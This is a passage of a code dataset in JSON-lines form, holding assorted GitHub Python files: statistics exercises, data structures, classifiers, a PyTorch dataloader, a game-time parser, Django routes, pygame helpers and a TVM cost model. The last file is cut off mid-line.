plt.savefig(\"outputs/Scatterplot.png\")\n\n # descriptive stats\n df.describe().write_csv(\"outputs/descriptive_stats.csv\")\n","repo_name":"nogibjj/IDS706-miniproject-week-3","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24606930036","text":"'''Median\nThe Median is the middle value among all the values in sorted order. Here we need to calculate the mid-value of all the values in a dataset. But before calculating the Median, we need to arrange all the values in sorted order. There are two different ways of calculating the median value:\n\nwhen the total number of values is even: Median = [(n/2)th term + {(n/2)+1}th]/2\nwhen the total number of values is odd: Median = {(n+1)/2}thterm\nNow below is how you can calculate the median using Python: '''\n\n# Median\n\nlist1 = [12, 16, 20, 20, 12, 30, 25, 23, 24, 20]\nlist1.sort()\n\nif len(list1) % 2 == 0:\n m1 = list1[len(list1)//2]\n m2 = list1[len(list1)//2 - 1]\n median = (m1 + m2)/2\nelse:\n median = list1[len(list1)//2]\nprint(median)","repo_name":"steepenraj15/basic-python-code","sub_path":"Project/Calculating Median.py","file_name":"Calculating Median.py","file_ext":"py","file_size_in_byte":751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10097659152","text":"a = {'Bob': 102, 'Ada': 201, 'Alice': 103, 'Tim': 50}\n\ndef max_dico(dico): \n name = \"\"\n like_max = 0\n for i in dico.items():\n if i[1] > like_max:\n like_max = i[1]\n name = i[0]\n return (name, like_max)\n\n\n\nprint(max_dico(a))\n\nprint(max_dico({'Alan': 222, 'Ada': 201, 'Eve': 220, 'Tim': 50}))","repo_name":"HSleymn/Solution-types-bac-pratique-2023","sub_path":"08/ex1.py","file_name":"ex1.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"1012028203","text":"__author__ = \"Fernando Andrade\"\n__copyright__ = \"Copyright 2020\"\n\n#Representação de Nodo em python\nclass NodoArvore:\n\tdef __init__(self, chave=None, esquerda=None, direita=None):\n\t\tself.chave = chave\n\t\tself.esquerda = esquerda\n\t\tself.direita = direita\n\n\tdef __repr__(self):\n\t\treturn '%s <- %s -> %s' % (self.esquerda and self.esquerda.chave,\n\t\t\t\t\t\t\t\t\tself.chave,\n\t\t\t\t\t\t\t\t\tself.direita and self.direita.chave)\n\ndef em_ordem(raiz):\n\tif not raiz:\n\t\treturn\n\n\tem_ordem(raiz.esquerda)\n\tprint(raiz.chave)\n\tem_ordem(raiz.direita)\n\n\nraiz = NodoArvore(40)\n\nraiz.esquerda = NodoArvore(20)\nraiz.direita = NodoArvore(60)\n\nraiz.direita.esquerda = NodoArvore(50)\nraiz.direita.direita = NodoArvore(70)\nraiz.esquerda.esquerda = NodoArvore(10)\nraiz.esquerda.direita = NodoArvore(30)\n\n#A representação do output é que no meio é o nodo pai, enquanto o da esquerda e direita\n#São os filhos.\n\nprint(\"Árvore: \",raiz)\n\n#Nodo corrente\nem_ordem(raiz)","repo_name":"fernanduandrade/logic-studies","sub_path":"Tree_Node/Tree_Node.py","file_name":"Tree_Node.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70769342937","text":"# def find_all_indices(values, value):\n# idx = 0\n# indices = []\n# while True:\n# try:\n# new_idx = values.index(value, idx)\n# indices.append(new_idx)\n# idx = new_idx + 1\n# except ValueError:\n# break\n#\n# return indices\n#\n#\n# print(find_all_indices([1, 2, 3, 4, 2, 1, 3, 1, 5], 1))\n#\n# tt = (1, 2, 3)\n# a, *rest = tt\n# print(a, rest)\n\n\nclass CustomSet:\n resize_factor = 0.7\n\n def __init__(self):\n self.count = 0\n self.capacity = 8\n self.values = [None] * self.capacity\n\n def execute_resize_check(self):\n return self.capacity * self.resize_factor <= self.count\n\n def resize(self):\n self.count = 0\n old_values = self.values\n self.capacity *= 2\n self.values = [None] * self.capacity\n for nested_lists in old_values:\n if nested_lists:\n for value in nested_lists:\n self.add(value)\n\n def get_index(self, value):\n return abs(hash(value)) % self.capacity\n\n def add(self, value):\n index = self.get_index(value)\n if self.values[index] is None:\n self.values[index] = []\n if value not in self.values[index]:\n self.values[index].append(value)\n self.count += 1\n if self.execute_resize_check():\n self.resize()\n\n def remove(self, value):\n if not self.contains(value):\n return\n index = self.get_index(value)\n self.values[index].remove(value)\n self.count -= 1\n\n def contains(self, value):\n index = self.get_index(value)\n if not self.values[index]:\n return False\n if value not in self.values[index]:\n return False\n return True\n\n def __contains__(self, item):\n return self.contains(item)\n\n def __len__(self):\n return self.count\n\n\n\nss = CustomSet()\n# ss.add('abc')\n#\nvalues = ['a',\n 1,\n 0,\n -1,\n (2, 3, 4),\n 3.14,\n 'Pesho',\n 'detail',\n 'glass',\n 'wood',\n 54,\n 'pepper',\n 'door',\n 'handle',\n None,\n 'phone',\n 'rocket',\n 12234,\n 'chess',\n -67.876,\n ]\n\nfor x in values:\n ss.add(x)\n\n# print(ss.values)\n# print(len(values))\n# print(len(ss.values))\n# count = 0\n# for value in ss.values:\n# if value:\n# count += 1\n# print(count)\n# print(ss.contains('Pesho'))\n# ss.remove('Pesho')\n# print(ss.values)\n# print(ss.contains('Pesho'))\n# print(54 in ss)\n# ss.remove(54)\n# print(54 in ss)\nprint(54 in ss)\nprint(len(ss))\nprint(type(ss))\nprint(ss)","repo_name":"StanDobrev11/Python_Advanced","sub_path":"03_Tuples_and_Sets_-_Lab/00_various_fm_lecture.py","file_name":"00_various_fm_lecture.py","file_ext":"py","file_size_in_byte":2699,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29221291603","text":"import numpy as np\nfrom classification.helpers.distances import cosine_sim, euclidean_dist\nfrom classification.base import BaseClassifier\n\n\nclass CosineClassifier(BaseClassifier):\n\n def __init__(self, data):\n BaseClassifier.__init__(self, data)\n\n def classify(self, x):\n sum = 0\n for d in self.data:\n sum += d['y'] * cosine_sim(x, d['x'])\n conf = np.abs(sum / len(self.data))\n return np.sign(sum), conf\n\n\nclass DistanceClassifier(BaseClassifier):\n\n def __init__(self, data, norm=True):\n BaseClassifier.__init__(self, data)\n self.norm = norm\n\n def classify(self, x):\n sum = 0\n for d in self.data:\n sum += d['y'] * (1 - 1 / 4 * pow(euclidean_dist(x,\n d['x'], norm=self.norm), 2))\n conf = np.abs(sum / len(self.data))\n return np.sign(sum), conf\n\n\nclass KNNCosineSquaredClassifier(BaseClassifier):\n\n def __init__(self, data, k=1):\n BaseClassifier.__init__(self, data)\n self.k = k\n\n def classify(self, x):\n ratings = []\n for d in self.data:\n r = pow(cosine_sim(x, d['x']), 2)\n ratings.append((r, d['y']))\n top_k = sorted(ratings, key=lambda t: t[0], reverse=True)[:self.k]\n top_classes = [t[1] for t in top_k]\n val, cnt = np.unique(top_classes, return_counts=True)\n counts = dict(zip(val, cnt))\n top_class = val[0]\n top_count = cnt[0]\n for i in reversed(range(self.k)):\n c = top_classes[i]\n if counts[c] >= top_count:\n top_count = counts[c]\n top_class = c\n conf = top_count / self.k\n return top_class, conf\n","repo_name":"emiliantolo/ensembles-quantum-classifiers","sub_path":"classification/classifiers/classical.py","file_name":"classical.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"33711859190","text":"import pandas as pd\nimport numpy as np\nimport os\n\nfrom collections import Counter\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.model_selection import train_test_split\n\nimport torch\nfrom torch.utils.data import Dataset, DataLoader\nfrom torch.utils.data.sampler import WeightedRandomSampler\n\n# train_data_root = \"./data/train_data.csv\"\ntrain_data_root = \"terrain-identification/data/train_data.csv\"\n\nSUBJECT_X_TEMPLATE = \"subject_{}_{}__x.csv\"\nSUBJECT_X_TIME_TEMPLATE = \"subject_{}_{}__x_time.csv\"\nSUBJECT_Y_TEMPLATE = \"subject_{}_{}__y.csv\"\nSUBJECT_Y_TIME_TEMPLATE = \"subject_{}_{}__y_time.csv\"\n\nX_HEADER = [\"acc_x\", \"acc_y\", \"acc_z\", \"gyro_x\", \"gyro_y\", \"gyro_z\"]\nY_HEADER = [\"label\"]\n\nBATCH_SIZE = 128\n\ndef parse_uid(uid):\n subject_id, session_num = uid.split(\"_\")\n # return int(subject_id), int(session_num)\n return subject_id, session_num\n\nclass SubjectDataset(Dataset):\n\n def __init__(self, datapath: str, ids: list):\n \n self.ids = ids\n self.datapath = datapath\n self.y_files = {uid: os.path.join(self.datapath, SUBJECT_Y_TEMPLATE.format(parse_uid(uid)[0], parse_uid(uid)[1])) for uid in self.ids}\n self.x_files = {uid: os.path.join(self.datapath, SUBJECT_X_TEMPLATE.format(parse_uid(uid)[0], parse_uid(uid)[1])) for uid in self.ids}\n \n # Generate a list of samples and determine the number of datapoints in the dataset \n # and build up the cache\n self.build_cache_and_datalen()\n\n def __len__(self):\n return self.num_samples\n\n def __getitem__(self, index):\n \n inputs = self.X[index]\n labels = np.array([self.y[index]])\n\n return torch.from_numpy(inputs), torch.from_numpy(labels)\n\n def build_cache_and_datalen(self):\n\n num_samples = 0\n timesteps = None\n\n X_list = []\n y_list = []\n\n for uid, y_file in self.y_files.items():\n # print(f\"Converting uid {uid}\")\n y = pd.read_csv(y_file)\n n_samples = len(y)\n num_samples += n_samples\n\n x_file = self.x_files[uid]\n X_dataframe = pd.read_csv(x_file)\n if timesteps is None:\n _sample = X_dataframe[X_dataframe[\"timestamp\"] == 0]\n timesteps = len(_sample)\n\n # Convert to numpy\n X = self.dataframe_to_numpy(X_dataframe, timesteps, y)\n\n X_list.append(X)\n y_list.append(y[\"label\"].values)\n\n self.X = np.concatenate(X_list, axis=0).astype(np.float32)\n self.y = np.concatenate(y_list, axis=0).astype(int)\n assert self.X.shape[0] == self.y.shape[0]\n \n self.num_samples = self.X.shape[0]\n\n def dataframe_to_numpy(self, df, timesteps, y_df):\n \"\"\"Convert from pandas to numpy for faster access\n \"\"\"\n len_array = int(len(df) / timesteps)\n assert len_array == len(y_df)\n\n values = df[X_HEADER].values\n X = values.reshape(len_array, timesteps, len(X_HEADER))\n \n return np.transpose(X, axes=(0, 2, 1)).copy()\n\nsplit_ids = {'train': ['005_02',\n '001_06',\n '003_02',\n '001_05',\n '002_02',\n '003_01',\n '003_03',\n '005_01',\n '001_07',\n '002_05',\n '004_02',\n '002_03',\n '001_02',\n '002_04',\n '001_03',\n '004_01',\n '005_03',\n '006_01',\n '006_02',\n '007_01',\n '007_03',\n '007_04',\n \n ],\n 'val': ['001_08', '002_01', '001_01', '001_04', '006_03','007_02','008_01'],\n}\ntrain_data_path = 'terrain-identification/data/TrainingData/filtered_window_1'\ntrain_dataset = SubjectDataset(\n train_data_path, \n split_ids[\"train\"]\n)\nys = train_dataset.y.tolist()\ncounts = Counter(ys)\nweights = np.array([1./counts[_y] for _y in ys])\nsample_weights = torch.from_numpy(weights).float()\nsampler = WeightedRandomSampler(\n weights=sample_weights,\n num_samples=len(sample_weights),\n replacement=True)\ntrain_dataloader = DataLoader(train_dataset, batch_size=BATCH_SIZE, sampler=sampler, drop_last=True)\ntrain_iterations = (len(train_dataset) // BATCH_SIZE) + ((len(train_dataset) % BATCH_SIZE) != 0)\n\nval_dataset = SubjectDataset(\n train_data_path, \n split_ids[\"val\"]\n)\nval_dataloader = DataLoader(val_dataset, batch_size=BATCH_SIZE, shuffle=True, drop_last=True)\nval_iterations = (len(val_dataset) // BATCH_SIZE) + ((len(val_dataset) % BATCH_SIZE) != 0)\n","repo_name":"Darth-Kronos/terrain-identification","sub_path":"dataloader.py","file_name":"dataloader.py","file_ext":"py","file_size_in_byte":4316,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"22257510941","text":"# ---------------------------------------------------------------------\n# IMPORTS\n\nimport json\nimport re\nfrom .HowLongToBeatEntry import HowLongToBeatEntry\nfrom difflib import SequenceMatcher\n\n# ---------------------------------------------------------------------\n\n\nclass JSONResultParser:\n \"\"\"\n This class parse the JSON code received from HowLongToBeat\n \"\"\"\n\n # Used for both images and game links\n IMAGE_URL_PREFIX = \"https://howlongtobeat.com/games/\"\n GAME_URL_PREFIX = \"https://howlongtobeat.com/game/\"\n\n def __init__(self, input_game_name: str, input_game_url: str,\n input_minimum_similarity: float, input_game_id: int = None,\n input_similarity_case_sensitive: bool = True):\n # Init instance variables\n self.results = []\n self.minimum_similarity = input_minimum_similarity\n self.similarity_case_sensitive = input_similarity_case_sensitive\n self.game_id = input_game_id\n self.base_game_url = input_game_url\n # Init object\n self.game_name = input_game_name\n self.game_name_numbers = []\n for word in input_game_name.split(\" \"):\n if word.isdigit():\n self.game_name_numbers.append(word)\n\n def parse_json_result(self, input_json_result):\n response_result = json.loads(input_json_result)\n for game in response_result[\"data\"]:\n new_game_entry = self.parse_json_element(game)\n # We have a game_id, so we are searching by id, add it only if the id is equal\n if self.game_id is not None and str(new_game_entry.game_id) != str(self.game_id):\n continue\n # Minimum Similarity is 0 so just add it straight away\n elif self.minimum_similarity == 0.0:\n self.results.append(new_game_entry)\n # Add it if it respects the minimum similarity\n elif new_game_entry.similarity >= self.minimum_similarity:\n self.results.append(new_game_entry)\n\n def parse_json_element(self, input_game_element):\n current_entry = HowLongToBeatEntry()\n # Compute base fields\n current_entry.game_id = input_game_element[\"game_id\"]\n current_entry.game_name = input_game_element[\"game_name\"]\n current_entry.game_alias = input_game_element[\"game_alias\"]\n current_entry.game_type = input_game_element[\"game_type\"]\n current_entry.game_image_url = self.IMAGE_URL_PREFIX + input_game_element[\"game_image\"]\n current_entry.game_web_link = self.GAME_URL_PREFIX + str(current_entry.game_id)\n current_entry.review_score = input_game_element[\"review_score\"]\n current_entry.profile_dev = input_game_element[\"profile_dev\"]\n current_entry.profile_platforms = input_game_element[\"profile_platform\"].split(\", \")\n current_entry.release_world = input_game_element[\"release_world\"]\n # Add full JSON content to the entry\n current_entry.json_content = input_game_element\n # Add a few times elements as help for the user\n current_entry.main_story = round(input_game_element[\"comp_main\"] / 3600, 2)\n current_entry.main_extra = round(input_game_element[\"comp_plus\"] / 3600, 2)\n current_entry.completionist = round(input_game_element[\"comp_100\"] / 3600, 2)\n current_entry.all_styles = round(input_game_element[\"comp_all\"] / 3600, 2)\n # Compute Similarity\n game_name_similarity = self.similar(self.game_name, current_entry.game_name,\n self.game_name_numbers, self.similarity_case_sensitive)\n game_alias_similarity = self.similar(self.game_name, current_entry.game_alias,\n self.game_name_numbers, self.similarity_case_sensitive)\n current_entry.similarity = max(game_name_similarity, game_alias_similarity)\n # Return it\n return current_entry\n\n @staticmethod\n def similar(a, b, game_name_numbers, similarity_case_sensitive):\n \"\"\"\n This function calculate how much the first string is similar to the second string\n @param a: First String\n @param b: Second String\n @param game_name_numbers: All the numbers in string, used for an additional check\n @param similarity_case_sensitive: If the SequenceMatcher() should be case-sensitive (true) or ignore case (false)\n @return: Return the similarity between the two string (0.0-1.0)\n \"\"\"\n if a is None or b is None:\n return 0\n # Check if we want a case-sensitive compare or not\n if similarity_case_sensitive:\n similarity = SequenceMatcher(None, a, b).ratio()\n else:\n similarity = SequenceMatcher(None, a.lower(), b.lower()).ratio()\n if game_name_numbers is not None and len(game_name_numbers) > 0: # additional check about numbers in the string\n number_found = False\n cleaned = re.sub(r'([^\\s\\w]|_)+', '', b)\n for word in cleaned.split(\" \"): # check for every word\n if word.isdigit(): # if is a digit\n for number_entry in game_name_numbers: # compare it with numbers in the begin string\n if str(number_entry) == str(word):\n number_found = True\n break\n if not number_found: # number in the given string not in this one, reduce prob\n similarity -= 0.1\n return similarity\n","repo_name":"ScrappyCocco/HowLongToBeat-PythonAPI","sub_path":"howlongtobeatpy/howlongtobeatpy/JSONResultParser.py","file_name":"JSONResultParser.py","file_ext":"py","file_size_in_byte":5508,"program_lang":"python","lang":"en","doc_type":"code","stars":61,"dataset":"github-code","pt":"68"} +{"seq_id":"29080012749","text":"\"\"\"Module providingFunction printing python version.\"\"\"\nfrom django.urls import path, include\nfrom files.views import *\n\nfrom files import views\n\nurlpatterns = [\n path(\"track/\", views.TrackFileView, name=\"track\"),\n path(\"update-file/\", views.OwnFileHistory, name=\"history\"),\n path(\"history/\", views.GetFileHistory, name=\"history\"),\n path('',views.home,name=\"home\"), \n path('about/',views.about,name=\"about\"),\n path('contact',views.contact,name=\"contact\"), \n path('signup',views.handleSignup,name=\"handleSignup\"),\n path('login',views.handlelogin,name=\"handlelogin\"),\n path('logout',views.handlelogout,name=\"handlelogout\"),\n path(\"create-file/\", views.CreateFileView, name=\"createfile\"),\n path(\"files/\", views.GetAllFiles, name=\"allfiles\"),\n path(\"files/\", views.GetFile, name=\"getfile\"),\n]","repo_name":"rajatgarg765/FileTrackerDjango","sub_path":"files/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"10420413545","text":"import pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nclass severityModel:\n\tdef __init__(self):\n\t\t'''\n\t\t\tInitializes the object\n\t\t'''\n\t\tself.loadData()\n\t\t\n\tdef loadData(self):\n\t\t'''\n\t\t\tLoads the data into memory\n\t\t'''\n\t\tself.train = pd.read_csv(\"C:\\\\Users\\\\Punkiehome1\\\\Downloads\\\\allstateKaggle\\\\train.csv\")\n\t\tself.test = pd.read_csv(\"C:\\\\Users\\\\Punkiehome1\\\\Downloads\\\\allstateKaggle\\\\test.csv\")\n\t\tprint(self.train.head())\n\t\tprint(self.train.shape)\n\t\tprint(self.test.head())\n\t\tprint(self.train.shape)\n\t\t\n\tdef getUnique(self):\n\t\t'''\n\t\t\tGets a list of distinct values\n\t\t'''\n\t\tself.categoryUnique = [None] * 115\n\t\ti = 0\n\t\t'''\n\t\t\tIterating over each categorical variable to \n\t\t\tsee how many unique values are in each\n\t\t\tStores the result in self.categoryUnique\n\t\t'''\n\t\tfor cols in self.train.ix[:,2:117]:\n\t\t\tself.categoryUnique[i] = len(np.unique(self.train.loc[:,cols]))\n\t\t\ti += 1\n\t\t\t\n\tdef getDescription(self):\n\t\t'''\n\t\t\tGets the description of all the continuous variables\n\t\t'''\n\t\tprint(self.train.loc[:,'cont1':].describe())\n\t\tprint(self.test.loc[:,'cont1':].describe())\n\t\t\n\tdef plotCont(self):\n\t\t'''\n\t\t\tGives a visual of the continuous variables\n\t\t'''\n\t\tcolors = np.random.rand(N)\n\t\tplt.scatter(np.array(self.train.loc[:,'cont1']).reshape(len(train), 1), np.array(self.train.loc[:'cont2']).reshape(len(train), 1), s=self.train.loc[:,'loss'], alpha=0.5)\n\t\tplt.show()\n\t\t\n\tdef getRatios(self):\n\t\t'''\n\t\t\tdoes some automatic feature creation for ratios of the continuous variables\n\t\t'''\n\t\t'''\n\t\t\tSubsets the entire train dataset into only continuous features and then further subsets\n\t\t\tbased on whether a continuous feature has a minimum greater than zero\n\t\t\tThe reason for this is because I will be creating ratios, and we cannot divide by zero\n\t\t'''\n\t\tself.train.loc[:,'cont1':'cont14'].loc[:,self.train.loc[:,'cont1':'cont14'].min() >0].head() \n\t\t\n\t\t'''\n\t\t\tVariables that have a minimum of 0 in the test dataset\n\t\t'''\n\t\tzeroMinVariables = ['cont9', 'cont10']\n\t\t\n\t\t'''\n\t\t\tThe new columns to be added to the dataframe\n\t\t'''\n\t\tnewCols = pd.DataFrame(columns = ['ratio1','ratio2','ratio3','ratio5','ratio6', 'ratio7', 'ratio8', 'ratio11', 'ratio12', 'ratio13', 'ratio14'])\n\t\t\n\t\toriginalStart = self.train.shape[1]\n\t\t\n\t\t'''\n\t\t\tadding the new columns which will show up as Nans to the train dataframe\n\t\t'''\n\t\tself.train = pd.concat([self.train, newCols], axis = 1)\n\t\t\n\t\t'''\n\t\t\tList of column names that will be iterated over to create new ratios\n\t\t'''\n\t\tcolNames = ['ratio1','ratio2','ratio3','ratio5','ratio6', 'ratio7', 'ratio8', 'ratio11', 'ratio12', 'ratio13', 'ratio14']\n\t\tcontNames = ['cont1','cont2','cont3','cont5','cont6', 'cont7', 'cont8', 'cont11', 'cont12', 'cont13', 'cont14'] \n\t\t\n\t\tstart = 1\n\t\tcolCounter = start\n\t\t\n\t\twhile colCounter <= len(colNames) - 1:\n\t\t\tself.train.loc[:,contNames[colCounter]] = self.train.loc[:,contNames[colCounter]]\n\t\t\t\n\t\t\tcolCounter = colCounter + 1\n\t\t#for contin in pd.concat([self.train.loc[:,'cont1':'cont8'], self.train.loc[:,'cont11':'cont14']], axis = 1):\n\t\t\t\n\t\n\t\n\t\t\nif __name__ == '__main__':\n\tinsuranceObj = severityModel()\n\tinsuranceObj.getUnique()\n\tprint(insuranceObj.categoryUnique)\n\tinsuranceObj.getDescription()\n\tinsuranceObj.getRatios()","repo_name":"rrigato/ML8","sub_path":"EDA.py","file_name":"EDA.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18648007135","text":"import pygame\nimport os #listdir, path.join, path.split\nfrom sky.tools import get_colour\n\n\nclass Graphics:\n def __init__(self, surface):\n self.surface = surface\n self.font = \"arial\"\n \n self.images = {}\n self.resized_images = {}\n self.fonts = {\"arial\":{\"30\":pygame.font.SysFont(\"arial\", 30)}}\n self.font_paths = {}\n \n def load_folder(self, dir, resize={}):\n for file in os.listdir(dir):\n if file.endswith(\".ttf\") or file.endswith(\".otf\"):\n self.load_font(os.path.join(dir, file))\n elif file.endswith(\".png\") or file.endswith(\".jpg\"):\n if file[:-4] in resize:\n self.load_image(os.path.join(dir, file), resize[file[:-4]])\n elif not type(resize) is dict:\n self.load_image(os.path.join(dir, file), resize)\n else:\n self.load_image(os.path.join(dir, file))\n \n def load_font(self, path):\n head, tail = os.path.split(path)\n name = tail[:-4]\n self.font_paths[name] = path\n self.fonts[name] = {}\n self.fonts[name][\"30\"] = pygame.font.Font(path, 30)\n \n def load_image(self, path, dimensions=None):\n head, tail = os.path.split(path)\n img = pygame.image.load(path).convert_alpha()\n if dimensions != None:\n img = pygame.transform.scale(img, (int(dimensions[0]), int(dimensions[1])))\n self.images[tail[:-4]] = img\n \n def load_sysfont(self, font):\n self.fonts[font] = {}\n self.fonts[font][\"30\"] = pygame.font.SysFont(font, 30)\n \n def draw(self, picture, pos, angle=None, size=None, transparency=None, center=None, return_info=False):\n image = self.images[picture].copy()\n x, y = pos\n if size != None:\n if picture in self.resized_images:\n if str(size) in self.resized_images[picture]:\n image = self.resized_images[picture][str(size)]\n else:\n self.resized_images[picture][str(size)] = image = pygame.transform.scale(image, size)\n else:\n image = pygame.transform.scale(image, size)\n self.resized_images[picture] = {str(size):image}\n if angle != None:\n image = pygame.transform.rotate(image, angle)\n rect = image.get_rect(center=(x, y))\n x, y = rect.topleft\n if center != None:\n if center[3] != 0:\n y = center[1] + center[3]/2 - image.get_height()/2\n if center[2] != 0:\n x = center[0] + center[2]/2 - image.get_width()/2\n if transparency != None:\n image.set_alpha(transparency)\n self.surface.blit(image, (x, y))\n if return_info:\n return (x, y, image.get_width(), image.get_height())\n\n def write(self, text, pos, size=30, colour=\"white\", transparency=None, font=None, center=None, return_info=False):\n if font == None:\n font = self.font\n colour = get_colour(colour)\n if not str(size) in self.fonts[font]:\n if font in pygame.font.get_fonts():\n self.fonts[font][str(size)] = pygame.font.SysFont(font, size)\n else:\n self.fonts[font][str(size)] = pygame.font.Font(self.font_paths[font], size)\n text = self.fonts[font][str(size)].render(str(text), True, colour)\n x, y = pos\n if center != None:\n if center[3] != 0:\n y = center[1] + center[3]/2 - text.get_height()/2\n if center[2] != 0:\n x = center[0] + center[2]/2 - text.get_width()/2\n if transparency != None:\n text.set_alpha(transparency)\n self.surface.blit(text, (x, y))\n if return_info:\n return (x, y, text.get_width(), text.get_height())\n \n def cut_spritesheet(self, image, rows, columns, amount):\n list = []\n number = 0\n sheet = self.images[image]\n w = sheet.get_width()/columns\n h = sheet.get_height()/rows\n for i in range(rows):\n for j in range(columns):\n number += 1\n list.append(sheet.subsurface(j * w, i * h, w, h))\n if number == amount:\n return list","repo_name":"ree1261/Cool-Movies","sub_path":"sky/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":4337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"18974172329","text":"from setuptools import setup, find_packages\nimport os\n\nversion = '1.1'\n\nsetup(name='plone.app.event-ploneintegration',\n version=version,\n description=\"Integration of plone.app.event into pre Plone 4.3 release.\",\n long_description=open(\"README.rst\").read() + \"\\n\" +\n open(os.path.join(\"docs\", \"HISTORY.rst\")).read(),\n # Get more strings from http://pypi.python.org/pypi?%3Aaction=list_classifiers\n classifiers=[\n \"Framework :: Plone\",\n \"Programming Language :: Python\",\n ],\n keywords='plone event',\n author='Plone Foundation',\n author_email='plone-developers@lists.sourceforge.net',\n url='https://github.com/collective/plone.app.event-ploneintegration',\n license='GPL',\n packages=find_packages(),\n namespace_packages=['plone','plone.app'],\n include_package_data=True,\n zip_safe=False,\n install_requires=[\n 'setuptools',\n 'plone.app.event[archetypes]',\n 'z3c.unconfigure',\n ],\n entry_points=\"\"\"\n [z3c.autoinclude.plugin]\n target = plone\n \"\"\")\n","repo_name":"collective/plone.app.event-ploneintegration","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"5264643823","text":"import numpy as np\nimport torch\nimport multiprocessing\nimport torch.nn.functional as F\nfrom .model_based_tuner import CostModel, FeatureCache\nfrom .model import Encoder, LSTM, MLP\nfrom .. import feature\n\n\nclass OneShotCostModel(CostModel):\n def __init__(self, task, num_threads=None, opt=None):\n super(OneShotCostModel, self).__init__()\n self.model_type = opt.model_type\n self.model_path = opt.model_path\n self.task = task\n self.target = task.target\n self.space = task.config_space\n self.fea_type = opt.feature\n device = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\n\n if self.model_type.lower() == \"transformer\":\n self.model = Encoder(\n embed_size=748,\n num_heads=4,\n num_layers=opt.layer,\n hidden_size=1024,\n dropout=0.25,\n ).to(device)\n self.model.load_state_dict(torch.load(self.model_path, map_location=device))\n elif self.model_type.lower() == \"lstm\":\n self.model = LSTM(748, 1024, 1, 3).to(device)\n self.model.load_state_dict(torch.load(self.model_path, map_location=device))\n elif self.model_type.lower() == \"mlp\":\n self.model = MLP(748, 1024, 1).to(device)\n self.model.load_state_dict(torch.load(self.model_path, map_location=device))\n else:\n raise (\"invaid model type only support transformer, lstm and mlp !\")\n self.feature_extract_func = _extract_curve_feature_index\n self.num_threads = num_threads\n self.pool = None\n self.feature_cache = FeatureCache()\n self.feature_extra_ct = 0\n self._sample_size = 0\n self._reset_pool(self.space, self.target, self.task)\n\n def _reset_pool(self, space, target, task):\n \"\"\"reset processing pool for feature extraction\"\"\"\n self._close_pool()\n # use global variable to pass common arguments\n global _extract_space, _extract_target, _extract_task\n\n _extract_space = space\n _extract_target = target\n _extract_task = task\n\n self.pool = multiprocessing.Pool(self.num_threads)\n\n def _close_pool(self):\n if self.pool:\n self.pool.terminate()\n self.pool.join()\n self.pool = None\n\n def _get_pool(self):\n return self.pool\n\n def fit(self, xs, ys, plan_size):\n # one-shot tuner only need predict!\n pass\n\n def fit_log(self, records, plan_size):\n # one-shot tuner only need predict!\n pass\n\n def predict(self, xs, output_margin=False):\n offset = 100\n pool = self._get_pool()\n features = pool.map(self.feature_extract_func, xs)\n result = np.zeros(len(features))\n mask = []\n filtered = []\n for g in features:\n if type(g) == bool:\n mask.append(False)\n else:\n filtered.append(g)\n mask.append(True)\n if len(filtered) == 0:\n return np.zeros(len(xs))\n filtered = torch.tensor(np.vstack(filtered)).float().cuda().unsqueeze(0)\n with torch.no_grad():\n predict = self.model(filtered).cpu().numpy()\n mask = np.array(mask)\n mask_idx = np.where(mask == True)\n for idx, value in zip(mask_idx[0], predict.squeeze()):\n result[idx] = value + offset\n return result\n\n def spawn_base_model(self):\n return OneShotCostModel(self.task, self.model_type, self.weight_path, self.embeded_path)\n\n def _get_feature(self, indexes):\n \"\"\"get features for indexes, run extraction if we do not have cache for them\"\"\"\n # free feature cache\n if self.feature_cache.size(self.fea_type) >= 100000:\n self.feature_cache.clear(self.fea_type)\n\n fea_cache = self.feature_cache.get(self.fea_type)\n\n indexes = np.array(indexes)\n need_extract = [x for x in indexes if x not in fea_cache]\n\n if need_extract:\n pool = self._get_pool()\n # If we are forking, we can pass arguments in globals for better performance\n if multiprocessing.get_start_method(False) == \"fork\":\n feas = pool.map(self.feature_extract_func, need_extract)\n else:\n args = [(self.space.get(x), self.target, self.task) for x in need_extract]\n feas = pool.map(self.feature_extract_func, args)\n for i, fea in zip(need_extract, feas):\n fea_cache[i] = fea\n ret = []\n for i, ii in enumerate(indexes):\n ret.append(fea_cache[ii])\n\n return ret\n\n def __del__(self):\n self._close_pool()\n\n\n_extract_space = None\n_extract_target = None\n_extract_task = None\n\n\ndef _extract_curve_feature_index(index, keep_name=False, task_name=None):\n \"\"\"extract sampled curve feature for an index in extract_space\"\"\"\n try:\n config = _extract_space.get(index)\n with _extract_target:\n sch, args = _extract_task.instantiate(config)\n result = feature.get_buffer_curve_sample_flatten(sch, args, sample_n=30, gpu_filter=True)\n if result == None:\n return False\n else:\n curve = result\n curve_zeros = np.zeros(720)\n curve_zeros[-len(curve) :] = curve\n knobs = 